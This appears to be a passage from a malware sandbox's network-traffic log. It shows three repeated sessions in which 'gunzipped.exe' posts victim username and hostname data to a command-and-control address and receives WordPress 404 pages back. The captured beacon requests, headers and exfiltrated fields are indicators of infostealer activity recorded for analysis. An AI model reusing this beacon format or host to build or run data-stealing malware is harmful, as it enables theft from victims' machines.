                          Apr 17, 2024 03:18:16.038465977 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          55192.168.2.549769136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:16.378463030 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:16.583364010 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:17.517573118 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:16 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:17.517642021 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:17.517679930 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:17.517716885 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:17.517760038 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:17.517796993 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:17.517834902 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:17.517875910 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:17.517915010 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:17.517956018 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          56192.168.2.549770136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:17.867641926 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:18.075788021 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:19.005958080 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:17 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:19.006020069 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:19.006059885 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:19.006100893 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:19.006145954 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:19.006184101 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:19.006222010 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:19.006259918 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:19.006299019 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:19.006341934 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          57192.168.2.549771136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:19.349313974 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:19.557465076 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:20.481523037 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:19 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
